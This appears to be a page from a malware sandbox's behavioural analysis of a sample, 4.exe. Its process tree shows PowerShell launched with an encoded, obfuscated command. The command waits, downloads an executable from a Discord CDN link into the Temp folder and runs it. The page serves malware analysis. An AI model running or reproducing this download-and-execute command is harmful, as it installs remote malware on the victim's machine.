popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • 4.exe "C:\Users\test22\AppData\Local\Temp\4.exe"

    292

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAbgBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA1ADUANQA5ADkAMgAwADAANgA3ADQAOAAxADYAMgAwAC8AMQAwADYANQA1ADYAMAA2ADIAOQA5ADcANAA0ADAAOQAyADQANgAvAFcAUAByAG8AdABlAGMATQBzAGMAdgAuAGUAeABlACcALAAgADwAIwBiAGQAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AYwBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAcQBjAHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQBhAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAaQBoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAPAAjAHUAYwBkACMAPgA="

      2212

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf